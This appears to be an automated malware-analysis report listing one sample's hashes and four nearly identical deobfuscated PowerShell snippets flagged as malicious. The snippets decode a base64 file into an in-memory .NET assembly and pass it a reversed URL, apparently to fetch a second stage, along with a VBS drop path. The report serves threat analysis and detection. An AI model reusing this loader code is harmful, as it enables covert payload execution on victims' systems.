|
Hash | Hash Value |
|---|---|
| MD5 | a652fcb1e5206dd1378ffe1964719677
|
| Sha1 | 6d19c80aaf6d047f9e5cdaf8cef292a2fa49911e
|
| Sha256 | c722b6557d74a0a6eab889a5e7d81032ff18759bb42928be3a8e4393b1e26f39
|
| Sha384 | 53104d5357bb5d620249344eb3ffedce198c2e64f397dd228f61557dfe73b1efbf579f199a180a463da44b096be28d81
|
| Sha512 | 377f575b1680f44c378eec9d54c7aa720b5792d35107172258492b37eff21dbcd69462cfe67f914cf8b7ae1be89f569e67915cedf0d6cbb1f58c64223f6dab41
|
| SSDeep | 24:Qsx6O/4+yu5b7nxByg5BI8lPMPMuZJYMwA64Ivt55Xhp:7x6A4UnxZ5dM0sg55hp
|
| TLSH | CC119410AAEC810975736B09C2BE91541577FA2DAD76CB1D0414D14D06B2A48DDB7F72
|
|
Name | Value |
|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca"))) |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } ))) |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) |
|
Name | Value | Location |
|---|---|---|
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca"))) Malicious |
a652fcb1e5206dd1378ffe1964719677 |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] (@({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } ))) Malicious |
a652fcb1e5206dd1378ffe1964719677 > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious |
a652fcb1e5206dd1378ffe1964719677 > [Deobfuscated PS] > [Deobfuscated PS] |
| Deobfuscated PowerShell | $txIeN = "txt.fanmogn/niam/sdaeh/sfer/sovihcra-sim/gpj-626262relgneps/moc.tnetnocresubuhtig.war//:sptth" $x = "C:\ProgramData\dSvwn.txt" $Ogmegc = (Get-Content -Path $x -Encoding "UTF8") $Ogmegc = $Ogmegc."replace"("=========", "A") [Byte[]] $VLmPe = [Convert]::"FromBase64String"($Ogmegc) [AppDomain]::"CurrentDomain"."Load"($VLmPe)."GetType"("FjrD.Gqga")."GetMethod"("NRJOMS")."Invoke"($yNlUO, [object[]] @({ @(($txIeN), "C:&Users&Admin&AppData&Local&Temp&System2.vbs", "OEzTJC", "03", "1", "caca") } )) Malicious |
a652fcb1e5206dd1378ffe1964719677 > [Deobfuscated PS] > [Deobfuscated PS] > [Deobfuscated PS] |